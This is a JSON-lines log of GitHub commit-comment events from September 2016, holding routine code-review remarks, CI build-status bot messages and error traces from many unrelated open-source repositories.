{"id":"4519202219","type":"CommitCommentEvent","actor":{"login":"fauxparse"},"repo":{"name":"fauxparse/nzif"},"payload":{"comment":{"id":18905543,"position":null,"line":null,"path":null,"commit_id":"76eb9ce41c9b78e8207e471529b0f739306e369a","created_at":"2016-09-06T04:40:56Z","updated_at":"2016-09-06T04:40:56Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;K4Fm2qnV&#x2F;56-show-pending-paypal-payments-in-the-checklist\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Show pending PayPal payments in the checklist</a>"}},"created_at":"2016-09-06T04:40:56Z"}
{"id":"4519202564","type":"CommitCommentEvent","actor":{"login":"fauxparse"},"repo":{"name":"fauxparse/nzif"},"payload":{"comment":{"id":18905545,"position":null,"line":null,"path":null,"commit_id":"ae833a778c068024a29008f685ca7e52858b3831","created_at":"2016-09-06T04:41:07Z","updated_at":"2016-09-06T04:41:07Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;HX1TeF29&#x2F;55-add-an-account-link-under-the-user-menu\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Add an account link under the user menu</a>"}},"created_at":"2016-09-06T04:41:07Z"}
{"id":"4519204841","type":"CommitCommentEvent","actor":{"login":"ajimonster"},"repo":{"name":"ajimonster/SQL"},"payload":{"comment":{"id":18905547,"position":null,"line":null,"path":null,"commit_id":"2bfcebbb5dcfa525f847b6c4317d283cbae36cc3","created_at":"2016-09-06T04:42:18Z","updated_at":"2016-09-06T04:42:18Z","body":"よく使う、もしくは便利だと思ったSQL構文の備忘録です"}},"created_at":"2016-09-06T04:42:18Z"}
{"id":"4519205995","type":"CommitCommentEvent","actor":{"login":"krader1961"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":18905551,"position":21,"line":47,"path":"tests/printf.in","commit_id":"363fa0a59884fbd5dc433fc31df17b78833704c6","created_at":"2016-09-06T04:42:49Z","updated_at":"2016-09-06T04:42:49Z","body":"> Sure, you define a locale with localedef.\r\n\r\nI'm aware of that command. Are you willing to put forth the effort to make that part of the fish unit test environment? And ensure it works on OS X, macOS, Linux, Cygwin, FreeBSD, Solaris, etc.? Or at least has a reasonable fallback behavior? That would be extremely useful. Especially as we continue to expand our unit tests to work in multiple locales in ways that are predictable. However, there is a delicate balance between tests that are hermetic and verify our behavior on the underlying platform."}},"created_at":"2016-09-06T04:42:49Z"}
{"id":"4519208303","type":"CommitCommentEvent","actor":{"login":"01micko"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18905552,"position":null,"line":null,"path":null,"commit_id":"d59298a56c7b30403e0db0682f4d8f01b270c39b","created_at":"2016-09-06T04:44:04Z","updated_at":"2016-09-06T04:44:04Z","body":"@wdlkmpx \r\n\r\n@mrfricks doesn't use them all so i think the default should be the checkboxes and as experienced woofers come to know the new routine they can use the config file. My 2cents"}},"created_at":"2016-09-06T04:44:04Z"}
{"id":"4519211665","type":"CommitCommentEvent","actor":{"login":"ingenieroariel"},"repo":{"name":"GeoNode/geonode"},"payload":{"comment":{"id":18905555,"position":null,"line":null,"path":null,"commit_id":"5e4e5d65e7ab43c02ba96a529b54df794deef80c","created_at":"2016-09-06T04:45:44Z","updated_at":"2016-09-06T04:45:44Z","body":"Done.\n\nOn Thu, Sep 1, 2016 at 6:08 AM, Jeffrey Johnson <notifications@github.com>\nwrote:\n\n> Ok, Ill try this. @ingenieroariel can you push up to the dockerhub?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/GeoNode/geonode/commit/5e4e5d65e7ab43c02ba96a529b54df794deef80c#commitcomment-18862071>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AADW1_larI2Is7G1J-16BIpL2nj3tRiRks5qlrI0gaJpZM4JyKqH>\n> .\n>\n"}},"created_at":"2016-09-06T04:45:44Z"}
{"id":"4519215889","type":"CommitCommentEvent","actor":{"login":"ssanketatre"},"repo":{"name":"ssanketatre/hello-java"},"payload":{"comment":{"id":18905559,"position":5,"line":34,"path":"README.md","commit_id":"a91ccf6aa9cadcf19a2a1191bf426ad932fda08b","created_at":"2016-09-06T04:47:54Z","updated_at":"2016-09-06T04:47:54Z","body":"That's all. Have fun!!!!!"}},"created_at":"2016-09-06T04:47:54Z"}
{"id":"4519216575","type":"CommitCommentEvent","actor":{"login":"ssanketatre"},"repo":{"name":"ssanketatre/hello-java"},"payload":{"comment":{"id":18905561,"position":5,"line":34,"path":"README.md","commit_id":"a91ccf6aa9cadcf19a2a1191bf426ad932fda08b","created_at":"2016-09-06T04:48:15Z","updated_at":"2016-09-06T04:48:15Z","body":"added new line"}},"created_at":"2016-09-06T04:48:15Z"}
{"id":"4519219086","type":"CommitCommentEvent","actor":{"login":"nixmaniack"},"repo":{"name":"syl20bnr/spacemacs"},"payload":{"comment":{"id":18905567,"position":null,"line":null,"path":null,"commit_id":"047b57223a8913699bc9ce52aa3046d934f40c9f","created_at":"2016-09-06T04:49:26Z","updated_at":"2016-09-06T04:49:26Z","body":"@rgrinberg Could you please file an issue according to [this](https://github.com/syl20bnr/spacemacs/wiki/Debugging) template. You can as well use `SPC h I` from spacemacs to pre-fill the information. "}},"created_at":"2016-09-06T04:49:26Z"}
{"id":"4519220071","type":"CommitCommentEvent","actor":{"login":"kholia"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18905568,"position":null,"line":null,"path":null,"commit_id":"bc5bcadbf22e74634380c56b72f59aa5c940e08f","created_at":"2016-09-06T04:49:53Z","updated_at":"2016-09-06T04:49:53Z","body":"@rschoem please take a note of this,  the hash format has changed from `$as400des$*AAAAAAA*CA2E330B2FD1820E` to `$as400des$AAAAAAA*CA2E330B2FD1820E`.  IBMiScanner should generate the newer type of hashes."}},"created_at":"2016-09-06T04:49:53Z"}
{"id":"4519224211","type":"CommitCommentEvent","actor":{"login":"inferst"},"repo":{"name":"yuche/vue-strap"},"payload":{"comment":{"id":18905571,"position":52,"line":119,"path":"src/Modal.vue","commit_id":"fdde0f9be148780b69bed7aa61723a6391be0657","created_at":"2016-09-06T04:51:58Z","updated_at":"2016-09-06T04:51:58Z","body":"I have a problem when vuestrap modal will been updated. When transitionend is not finished and i go to another route, callback has no time operate.\r\nThis good thing if have event."}},"created_at":"2016-09-06T04:51:58Z"}
{"id":"4519225134","type":"CommitCommentEvent","actor":{"login":"dandyboy777"},"repo":{"name":"dandyboy777/USBtin"},"payload":{"comment":{"id":18905572,"position":null,"line":null,"path":null,"commit_id":"bd8823e4d7fc1f8e2c202f809ad382a92be033ab","created_at":"2016-09-06T04:52:27Z","updated_at":"2016-09-06T04:52:27Z","body":"добавлено описание "}},"created_at":"2016-09-06T04:52:27Z"}
{"id":"4519227143","type":"CommitCommentEvent","actor":{"login":"KIngCompute"},"repo":{"name":"KIngCompute/nikhil"},"payload":{"comment":{"id":18905577,"position":null,"line":null,"path":null,"commit_id":"59a30d4472d3d9f44b7d109d1f9c4f48792f8741","created_at":"2016-09-06T04:53:27Z","updated_at":"2016-09-06T04:53:27Z","body":"edit code"}},"created_at":"2016-09-06T04:53:27Z"}
{"id":"4519228640","type":"CommitCommentEvent","actor":{"login":"KIngCompute"},"repo":{"name":"KIngCompute/nikhil"},"payload":{"comment":{"id":18905581,"position":null,"line":null,"path":null,"commit_id":"59a30d4472d3d9f44b7d109d1f9c4f48792f8741","created_at":"2016-09-06T04:54:14Z","updated_at":"2016-09-06T04:54:14Z","body":"ok"}},"created_at":"2016-09-06T04:54:14Z"}
{"id":"4519232149","type":"CommitCommentEvent","actor":{"login":"mrchapp"},"repo":{"name":"mrchapp/meta-96boards"},"payload":{"comment":{"id":18905587,"position":1,"line":1,"path":"recipes-graphics/wayland/weston-init/71-weston-input.rules","commit_id":"01e490b71b7a66df345e8aebd67972f0dc6cc30b","created_at":"2016-09-06T04:56:02Z","updated_at":"2016-09-06T04:56:02Z","body":"\"event[0-9]*\" or \"event0\"?"}},"created_at":"2016-09-06T04:56:02Z"}
{"id":"4519232363","type":"CommitCommentEvent","actor":{"login":"atamariya"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18905588,"position":null,"line":null,"path":null,"commit_id":"1581ee2e54d8ef6eb1f47c9958b0d8733778cd4a","created_at":"2016-09-06T04:56:08Z","updated_at":"2016-09-06T04:56:08Z","body":"@Sami32 it's not that LPCM doesn't work as noted by @Nadahar in another thread. If renderer's default LPCM play configuration is same as the stream served by UMS, there's absolutely no problem. It's the mis-matched configuration, that we should strive to fix (the case with transcoding)."}},"created_at":"2016-09-06T04:56:08Z"}
{"id":"4519235761","type":"CommitCommentEvent","actor":{"login":"jimcghee"},"repo":{"name":"jimcghee/Echo2Vera"},"payload":{"comment":{"id":18905595,"position":null,"line":null,"path":null,"commit_id":"4cd71900ba941731cfeea7054271ffc74bfc437e","created_at":"2016-09-06T04:57:50Z","updated_at":"2016-09-06T04:57:50Z","body":"Temporally disabled increment/decrement due to an apparent bug."}},"created_at":"2016-09-06T04:57:50Z"}
{"id":"4519237648","type":"CommitCommentEvent","actor":{"login":"smeetha"},"repo":{"name":"smeetha/testDevOps"},"payload":{"comment":{"id":18905597,"position":null,"line":null,"path":null,"commit_id":"cbd5b9e83bd031b475fc48fb7680d7d405327cd5","created_at":"2016-09-06T04:58:41Z","updated_at":"2016-09-06T04:58:41Z","body":"Done by smeetha"}},"created_at":"2016-09-06T04:58:41Z"}
{"id":"4519239339","type":"CommitCommentEvent","actor":{"login":"shashi0256"},"repo":{"name":"shashi0256/firstproject"},"payload":{"comment":{"id":18905600,"position":null,"line":null,"path":null,"commit_id":"d9080b336984bb14573b30988bbaf084ffacce8c","created_at":"2016-09-06T04:59:31Z","updated_at":"2016-09-06T04:59:31Z","body":"echo \"hello world\""}},"created_at":"2016-09-06T04:59:31Z"}
{"id":"4519242244","type":"CommitCommentEvent","actor":{"login":"floam"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":18905605,"position":21,"line":47,"path":"tests/printf.in","commit_id":"363fa0a59884fbd5dc433fc31df17b78833704c6","created_at":"2016-09-06T05:00:46Z","updated_at":"2016-09-06T05:00:46Z","body":"I don't have access to Solaris or Cygwin. Do the tests work on those?"}},"created_at":"2016-09-06T05:00:46Z"}
{"id":"4519243254","type":"CommitCommentEvent","actor":{"login":"techtonik"},"repo":{"name":"nmap/npcap"},"payload":{"comment":{"id":18905606,"position":null,"line":null,"path":null,"commit_id":"87b126d6c9887bb05f0164953f1eb89a4888c56e","created_at":"2016-09-06T05:01:15Z","updated_at":"2016-09-06T05:01:15Z","body":"> upgrate to Win7, doesn't Windows support a free update?\r\n\r\nNo."}},"created_at":"2016-09-06T05:01:15Z"}
{"id":"4519244777","type":"CommitCommentEvent","actor":{"login":"nortikin"},"repo":{"name":"nortikin/sverchok"},"payload":{"comment":{"id":18905608,"position":null,"line":null,"path":null,"commit_id":"c86190f96bf659deb6c0de3bf52cdfdf3c8cf665","created_at":"2016-09-06T05:02:03Z","updated_at":"2016-09-06T05:02:03Z","body":"Blender 2.76 sorry for late answer. Thank you!"}},"created_at":"2016-09-06T05:02:03Z"}
{"id":"4519246402","type":"CommitCommentEvent","actor":{"login":"macumber"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18905609,"position":33,"line":248,"path":"openstudiocore/src/cli/main.cpp","commit_id":"df35b9901103837bebee6d4ff0f9287a6a592cae","created_at":"2016-09-06T05:02:49Z","updated_at":"2016-09-06T05:02:49Z","body":"@kbenne https://github.com/NREL/OpenStudio/commit/e45b489e09ab70f63e5a03657d673d5feaf0b2c7"}},"created_at":"2016-09-06T05:02:49Z"}
{"id":"4519246811","type":"CommitCommentEvent","actor":{"login":"trink"},"repo":{"name":"mozilla-services/lua_sandbox_extensions"},"payload":{"comment":{"id":18905611,"position":31,"line":60,"path":"lsb/modules/lsb/util.lua","commit_id":"320d2aee5522fd48e45f4a1f6a0caa50eff7b3d7","created_at":"2016-09-06T05:03:02Z","updated_at":"2016-09-06T05:03:02Z","body":"yeah, docs are wrong obviously the unit test is correct"}},"created_at":"2016-09-06T05:03:02Z"}
{"id":"4519248861","type":"CommitCommentEvent","actor":{"login":"heikkil"},"repo":{"name":"lujun9972/org-preview-html"},"payload":{"comment":{"id":18905616,"position":null,"line":null,"path":null,"commit_id":"bcf9f9abca0aa458ba018e0914112b4ec450ce82","created_at":"2016-09-06T05:04:04Z","updated_at":"2016-09-06T05:04:04Z","body":"Offer accepted. Thanks!\r\n\r\nI can do small things but will discuss with you if I see need for bigger things."}},"created_at":"2016-09-06T05:04:04Z"}
{"id":"4519249281","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":18905617,"position":9,"line":0,"path":"truffle/src/main/ruby/core/argf.rb","commit_id":"137f0f1c6be79981acaf8e1f15de6bcd8ded5f86","created_at":"2016-09-06T05:04:16Z","updated_at":"2016-09-06T05:04:16Z","body":"Why not just .clear ?"}},"created_at":"2016-09-06T05:04:16Z"}
{"id":"4519250306","type":"CommitCommentEvent","actor":{"login":"cicku"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":18905621,"position":null,"line":null,"path":null,"commit_id":"722c2aa60cf873c01d1f2de8f4e5637c547b40b5","created_at":"2016-09-06T05:04:46Z","updated_at":"2016-09-06T05:04:46Z","body":"#333"}},"created_at":"2016-09-06T05:04:46Z"}
{"id":"4519254480","type":"CommitCommentEvent","actor":{"login":"ignatenkobrain"},"repo":{"name":"turicas/rows"},"payload":{"comment":{"id":18905633,"position":12,"line":38,"path":"tests/tests_utils.py","commit_id":"4b91c38123944e40b89f6b610c6b560d8270f918","created_at":"2016-09-06T05:06:48Z","updated_at":"2016-09-06T05:06:48Z","body":"I would recommend to use `first.lower().rsplit('-', 1)[0]`"}},"created_at":"2016-09-06T05:06:48Z"}
{"id":"4519255127","type":"CommitCommentEvent","actor":{"login":"techtonik"},"repo":{"name":"nmap/npcap"},"payload":{"comment":{"id":18905635,"position":null,"line":null,"path":null,"commit_id":"87b126d6c9887bb05f0164953f1eb89a4888c56e","created_at":"2016-09-06T05:07:07Z","updated_at":"2016-09-06T05:07:07Z","body":"Original WinPcap driver doesn't support loopback interface, so that's why I downloaded `npcap`\r\n\r\nAnd as for operating systems usage, there are 5x times more XP and Vista stations that Linux ones. =/\r\nhttps://www.netmarketshare.com/operating-system-market-share.aspx?qprid=10&qpcustomd=0"}},"created_at":"2016-09-06T05:07:07Z"}
{"id":"4519255453","type":"CommitCommentEvent","actor":{"login":"ss-plus"},"repo":{"name":"ss-plus/shadowsocks-libev"},"payload":{"comment":{"id":18905636,"position":null,"line":null,"path":null,"commit_id":"3ec3e4e690370cc64aa786b8c95f80f1e4d60b98","created_at":"2016-09-06T05:07:16Z","updated_at":"2016-09-06T05:07:16Z","body":"v2.4.8"}},"created_at":"2016-09-06T05:07:16Z"}
{"id":"4519258304","type":"CommitCommentEvent","actor":{"login":"ss-plus"},"repo":{"name":"ss-plus/reversed-shadowsocks-libev"},"payload":{"comment":{"id":18905645,"position":null,"line":null,"path":null,"commit_id":"51e0bb66bfb236869f700947bffcbc11d5258b26","created_at":"2016-09-06T05:08:42Z","updated_at":"2016-09-06T05:08:42Z","body":"v2.4.8"}},"created_at":"2016-09-06T05:08:42Z"}
{"id":"4519259161","type":"CommitCommentEvent","actor":{"login":"nullobject"},"repo":{"name":"conversation/babushka-deps"},"payload":{"comment":{"id":18905646,"position":16,"line":73,"path":"packages.rb","commit_id":"ea4e20df6f1a519347a630a9fa2e6aa58f342d08","created_at":"2016-09-06T05:09:09Z","updated_at":"2016-09-06T05:09:09Z","body":"Should this be `geoipupdate` too?"}},"created_at":"2016-09-06T05:09:09Z"}
{"id":"4519260386","type":"CommitCommentEvent","actor":{"login":"yob"},"repo":{"name":"conversation/babushka-deps"},"payload":{"comment":{"id":18905647,"position":16,"line":73,"path":"packages.rb","commit_id":"ea4e20df6f1a519347a630a9fa2e6aa58f342d08","created_at":"2016-09-06T05:09:49Z","updated_at":"2016-09-06T05:09:49Z","body":"d'oh!"}},"created_at":"2016-09-06T05:09:49Z"}
{"id":"4519260596","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18905649,"position":null,"line":null,"path":null,"commit_id":"e45b489e09ab70f63e5a03657d673d5feaf0b2c7","created_at":"2016-09-06T05:09:55Z","updated_at":"2016-09-06T05:09:55Z","body":"os_2_0_no_apppathhelpers (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e45b489e09ab70f63e5a03657d673d5feaf0b2c7-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e45b489e09ab70f63e5a03657d673d5feaf0b2c7-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-06T05:09:55Z"}
{"id":"4519261619","type":"CommitCommentEvent","actor":{"login":"Maulana57"},"repo":{"name":"ihsanarifr/e-complaints"},"payload":{"comment":{"id":18905652,"position":7,"line":7,"path":"application/third_party/Smarty3/templates_c/bcbd6aa5619d6e303dbdf7b511dfa6db25750ef5.file.tingkat_kota.tpl.php","commit_id":"56bde19fbb1892aaadca65826a9311c078c2731c","created_at":"2016-09-06T05:10:21Z","updated_at":"2016-09-06T05:10:21Z","body":"hhjkjhk"}},"created_at":"2016-09-06T05:10:21Z"}
{"id":"4519261977","type":"CommitCommentEvent","actor":{"login":"nullobject"},"repo":{"name":"conversation/babushka-deps"},"payload":{"comment":{"id":18905654,"position":16,"line":73,"path":"packages.rb","commit_id":"ea4e20df6f1a519347a630a9fa2e6aa58f342d08","created_at":"2016-09-06T05:10:31Z","updated_at":"2016-09-06T05:10:31Z","body":"Yay for code reviews 😜 "}},"created_at":"2016-09-06T05:10:31Z"}
{"id":"4519262846","type":"CommitCommentEvent","actor":{"login":"yob"},"repo":{"name":"conversation/babushka-deps"},"payload":{"comment":{"id":18905658,"position":16,"line":73,"path":"packages.rb","commit_id":"ea4e20df6f1a519347a630a9fa2e6aa58f342d08","created_at":"2016-09-06T05:10:56Z","updated_at":"2016-09-06T05:10:56Z","body":"fixed in a followup commit"}},"created_at":"2016-09-06T05:10:56Z"}
{"id":"4519262858","type":"CommitCommentEvent","actor":{"login":"joelin"},"repo":{"name":"joelin/docker-utils"},"payload":{"comment":{"id":18905659,"position":null,"line":null,"path":null,"commit_id":"3727e9fa17e41e573c325ee232a345736173645e","created_at":"2016-09-06T05:10:57Z","updated_at":"2016-09-06T05:10:57Z","body":"/usr/local/lib/ruby/gems/2.2.0/gems/bundler-1.12.5/lib/bundler/runtime.rb:35:in `block in setup': You have already activated rouge 1.11.1, but your Gemfile requires rouge 2.0.5. Prepending `bundle exec` to your command may solve this. (Gem::LoadError)\r\n\tfrom /usr/local/lib/ruby/gems/2.2.0/gems/bundler-1.12.5/lib/bundler/runtime.rb:20:in `map'\r\n\tfrom /usr/local/lib/ruby/gems/2.2.0/gems/bundler-1.12.5/lib/bundler/runtime.rb:20:in `setup'\r\n\tfrom /usr/local/lib/ruby/gems/2.2.0/gems/bundler-1.12.5/lib/bundler.rb:95:in `setup'\r\n\tfrom /usr/local/bundle/gems/jekyll-3.2.1/lib/jekyll/plugin_manager.rb:36:in `require_from_bundler'\r\n\tfrom /usr/local/bundle/gems/jekyll-3.2.1/exe/jekyll:9:in `<top (required)>'\r\n\tfrom /usr/local/bundle/bin/jekyll:22:in `load'\r\n\tfrom /usr/local/bundle/bin/jekyll:22:in `<main>'\r\n[jhsadmin@localhost site]$ docker run -v /home/jhsadmin/xhlin/cloud-training:/opt/site-src -v /home/jhsadmin/xhlin/site:/opt/site -t 172.17.138.101:5000/jeklly\r\n/usr/local/lib/ruby/gems/2.2.0/gems/bundler-1.12.5/lib/bundler/runtime.rb:35:in `block in setup': You have already activated rouge 1.11.1, but your Gemfile requires rouge 2.0.5. Prepending `bundle exec` to your command may solve this. (Gem::LoadError)\r\n\tfrom /usr/local/lib/ruby/gems/2.2.0/gems/bundler-1.12.5/lib/bundler/runtime.rb:20:in `map'\r\n\tfrom /usr/local/lib/ruby/gems/2.2.0/gems/bundler-1.12.5/lib/bundler/runtime.rb:20:in `setup'\r\n\tfrom /usr/local/lib/ruby/gems/2.2.0/gems/bundler-1.12.5/lib/bundler.rb:95:in `setup'\r\n\tfrom /usr/local/bundle/gems/jekyll-3.2.1/lib/jekyll/plugin_manager.rb:36:in `require_from_bundler'\r\n\tfrom /usr/local/bundle/gems/jekyll-3.2.1/exe/jekyll:9:in `<top (required)>'\r\n\tfrom /usr/local/bundle/bin/jekyll:22:in `load'\r\n\tfrom /usr/local/bundle/bin/jekyll:22:in `<main>'\r\n[jhsadmin@localhost site]$ cat /etc/redhat-release \r\nCentOS Linux release 7.2.1511 (Core) \r\n"}},"created_at":"2016-09-06T05:10:57Z"}
{"id":"4519264140","type":"CommitCommentEvent","actor":{"login":"allinjames"},"repo":{"name":"allinjames/t1"},"payload":{"comment":{"id":18905665,"position":null,"line":null,"path":null,"commit_id":"bfa112f401b284899bb250f64ca83d5c74d9c516","created_at":"2016-09-06T05:11:34Z","updated_at":"2016-09-06T05:11:34Z","body":"# 我的第一份文档\r\n   **时间就像海绵，挤一挤还是会有的。**"}},"created_at":"2016-09-06T05:11:34Z"}
{"id":"4519264670","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18905667,"position":null,"line":null,"path":null,"commit_id":"e45b489e09ab70f63e5a03657d673d5feaf0b2c7","created_at":"2016-09-06T05:11:51Z","updated_at":"2016-09-06T05:11:51Z","body":"os_2_0_no_apppathhelpers (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e45b489e09ab70f63e5a03657d673d5feaf0b2c7-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e45b489e09ab70f63e5a03657d673d5feaf0b2c7-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-06T05:11:51Z"}
{"id":"4519266312","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18905672,"position":null,"line":null,"path":null,"commit_id":"e45b489e09ab70f63e5a03657d673d5feaf0b2c7","created_at":"2016-09-06T05:12:42Z","updated_at":"2016-09-06T05:12:42Z","body":"os_2_0_no_apppathhelpers (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e45b489e09ab70f63e5a03657d673d5feaf0b2c7-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e45b489e09ab70f63e5a03657d673d5feaf0b2c7-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-06T05:12:42Z"}
{"id":"4519269091","type":"CommitCommentEvent","actor":{"login":"LinusBorg"},"repo":{"name":"vuejs/vuejs.org"},"payload":{"comment":{"id":18905680,"position":14,"line":554,"path":"src/api/index.md","commit_id":"bd5f8e334505464df76174666effe4fac1760bc5","created_at":"2016-09-06T05:14:05Z","updated_at":"2016-09-06T05:14:05Z","body":"We should link to it from every hook nonetheless, because users won't read API docs top to bottom, they will jumpy to specific topics from navigation or search. "}},"created_at":"2016-09-06T05:14:05Z"}
{"id":"4519269118","type":"CommitCommentEvent","actor":{"login":"Fsu0413"},"repo":{"name":"Mogara/QSanguosha-For-Hegemony"},"payload":{"comment":{"id":18905681,"position":45,"line":315,"path":"src/package/standard-tricks.cpp","commit_id":"4b1a74f7c94fd33d619eca2a84f7b1c4e4439360","created_at":"2016-09-06T05:14:06Z","updated_at":"2016-09-06T05:14:06Z","body":"5个空格什么鬼"}},"created_at":"2016-09-06T05:14:06Z"}
{"id":"4519271453","type":"CommitCommentEvent","actor":{"login":"LinusBorg"},"repo":{"name":"vuejs/vuejs.org"},"payload":{"comment":{"id":18905685,"position":26,"line":566,"path":"src/api/index.md","commit_id":"bd5f8e334505464df76174666effe4fac1760bc5","created_at":"2016-09-06T05:15:13Z","updated_at":"2016-09-06T05:15:13Z","body":"Agreed"}},"created_at":"2016-09-06T05:15:13Z"}
{"id":"4519271897","type":"CommitCommentEvent","actor":{"login":"ELynx"},"repo":{"name":"ELynx/pokemon-go-xposed-mitm"},"payload":{"comment":{"id":18905686,"position":null,"line":null,"path":null,"commit_id":"d9e1e035643d3d16dc3150ee54e8050fb0f3eaef","created_at":"2016-09-06T05:15:26Z","updated_at":"2016-09-06T05:15:26Z","body":"I think of it as of tactical regrouping. Some day I am sure we will tackle this.\r\nAs saying goes, smart people don't go over the mountain, they go around it."}},"created_at":"2016-09-06T05:15:26Z"}
{"id":"4519275362","type":"CommitCommentEvent","actor":{"login":"dinosaadeh"},"repo":{"name":"dinosaadeh/Barjis"},"payload":{"comment":{"id":18905690,"position":71,"line":116,"path":"core/src/com/smb215team/barjis/game/objects/Pawn.java","commit_id":"08716faae207e923350e6234b8c5a8f45520aea2","created_at":"2016-09-06T05:17:03Z","updated_at":"2016-09-06T05:17:03Z","body":"@najidagher what about these calculations? I didn't understand their purpose."}},"created_at":"2016-09-06T05:17:03Z"}
{"id":"4519276035","type":"CommitCommentEvent","actor":{"login":"LinusBorg"},"repo":{"name":"vuejs/vuejs.org"},"payload":{"comment":{"id":18905693,"position":68,"line":608,"path":"src/api/index.md","commit_id":"bd5f8e334505464df76174666effe4fac1760bc5","created_at":"2016-09-06T05:17:22Z","updated_at":"2016-09-06T05:17:22Z","body":"As witch `created` we should document weither hooks are synchonous"}},"created_at":"2016-09-06T05:17:22Z"}
{"id":"4519277245","type":"CommitCommentEvent","actor":{"login":"griest024"},"repo":{"name":"ELynx/pokemon-go-xposed-mitm"},"payload":{"comment":{"id":18905696,"position":null,"line":null,"path":null,"commit_id":"d9e1e035643d3d16dc3150ee54e8050fb0f3eaef","created_at":"2016-09-06T05:17:56Z","updated_at":"2016-09-06T05:17:56Z","body":"yes it would be nice to have shiny new jruby with all its nice features."}},"created_at":"2016-09-06T05:17:56Z"}
{"id":"4519278672","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18905704,"position":null,"line":null,"path":null,"commit_id":"e45b489e09ab70f63e5a03657d673d5feaf0b2c7","created_at":"2016-09-06T05:18:35Z","updated_at":"2016-09-06T05:18:35Z","body":"os_2_0_no_apppathhelpers (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e45b489e09ab70f63e5a03657d673d5feaf0b2c7-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e45b489e09ab70f63e5a03657d673d5feaf0b2c7-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-06T05:18:35Z"}
{"id":"4519279207","type":"CommitCommentEvent","actor":{"login":"simozhan"},"repo":{"name":"product-definition-center/product-definition-center"},"payload":{"comment":{"id":18905707,"position":9,"line":9,"path":"pdc/apps/release/templates/product_list_include.html","commit_id":"ec04e6f88dc36b8a02cc01538f2e65a3a89d3d4d","created_at":"2016-09-06T05:18:50Z","updated_at":"2016-09-06T05:18:50Z","body":"'Active' and 'Only active' makes me confused. Why change it to these choices."}},"created_at":"2016-09-06T05:18:50Z"}
{"id":"4519288365","type":"CommitCommentEvent","actor":{"login":"Paul044"},"repo":{"name":"Paul044/rs-task1"},"payload":{"comment":{"id":18905726,"position":1,"line":1,"path":"README.md","commit_id":"85462feaf03bb20ca0a6c6624fb572a914f5b7b2","created_at":"2016-09-06T05:22:52Z","updated_at":"2016-09-06T05:22:52Z","body":"1"}},"created_at":"2016-09-06T05:22:52Z"}
{"id":"4519288570","type":"CommitCommentEvent","actor":{"login":"allinjames"},"repo":{"name":"allinjames/t1"},"payload":{"comment":{"id":18905727,"position":null,"line":null,"path":null,"commit_id":"bfa112f401b284899bb250f64ca83d5c74d9c516","created_at":"2016-09-06T05:22:58Z","updated_at":"2016-09-06T05:22:58Z","body":"# 我的第二份文档# \r\n**细水长流，走着瞧**"}},"created_at":"2016-09-06T05:22:58Z"}
